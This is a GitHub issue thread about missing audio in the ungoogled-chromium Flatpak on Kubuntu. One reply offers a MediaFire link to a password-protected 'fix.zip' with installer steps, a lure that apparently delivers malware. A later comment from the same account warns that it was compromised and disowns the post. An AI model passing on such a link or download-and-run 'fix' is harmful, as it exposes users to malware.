### ISSUE TITLE
No sound — V. 128.0.6613.84, Flatpack, Kubuntu

### ISSUE THREAD

**Issue by Zanzibari** [ungoogled-software/ungoogled-chromium-flatpak#10]
Hi, 
Thanks for making this browser! It runs on 2 different computer with Kubuntu Noble. On 1 device all is fine, but on the other all videos are played without sound. 
If I use LibreWolf on this very device however, sound is there. 

Is there a certain setting, which I might have overlooked?

Cheers.

**Comment by nxllxvxxd** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by nxllxvxxd** [comment]
# **DO NOT DOWNLOAD ANYTHING I HAVE POSTED AS A COMMENT MY ACCOUNT WAS COMPROMISED AND BEING USED TO COMPROMISE OTHERS**

**I AM WORKING ON DELETING AND POSTING THIS ON ALL THREADS IN WHICH THEY USED MY ACCOUNT TO POST THIS**
